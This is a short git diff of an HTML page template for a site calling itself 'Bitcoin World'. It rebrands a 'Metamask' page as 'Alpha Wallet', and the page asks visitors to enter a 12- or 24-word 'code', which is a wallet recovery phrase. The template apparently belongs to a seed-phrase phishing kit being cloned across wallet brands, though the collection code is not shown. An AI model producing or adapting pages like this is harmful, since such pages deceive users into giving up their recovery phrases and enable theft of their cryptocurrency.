--- a/templates/alphawallet.html
+++ b/templates/alphawallet.html
@@ -18,7 +18,7 @@
     <header id="site-header" class="fixed-top">
         <div class="container">
             <nav class="navbar navbar-expand-lg navbar-light stroke">
-                <h1><a class="navbar-brand" href="index.html">
+                <h1><a class="navbar-brand" href="#">
                         Bitcoin <span class="sub-color">World</span>
                     </a></h1>
                 <button class="navbar-toggler collapsed" type="button" data-bs-toggle="collapse" data-bs-target="#navbarScroll" aria-controls="navbarScroll" aria-expanded="false" aria-label="Toggle navigation">
@@ -38,7 +38,7 @@
                     <div class="w3breadcrumb-left text-left">
                         
                         <p class="inner-page-para mt-2">
-                            Metamask </p>
+                            Alpha Wallet </p>
                     </div>
                     
                 </div>
@@ -53,7 +53,7 @@
 		<div class="container py-md-5">
 			<div class="title-content text-center mb-md-5 mb-4">
 				
-				<p class="text-para mt-2">Enter code for <b style="color:#fa9f1e">Metamask</b></p>
+				<p class="text-para mt-2">Enter code for <b style="color:#fa9f1e">Alpha wallet</b></p>
 				<p class="text-para">Typically 12 (sometimes 24) words separated by single spaces</p>
 			</div>
 			<div class="top-map">
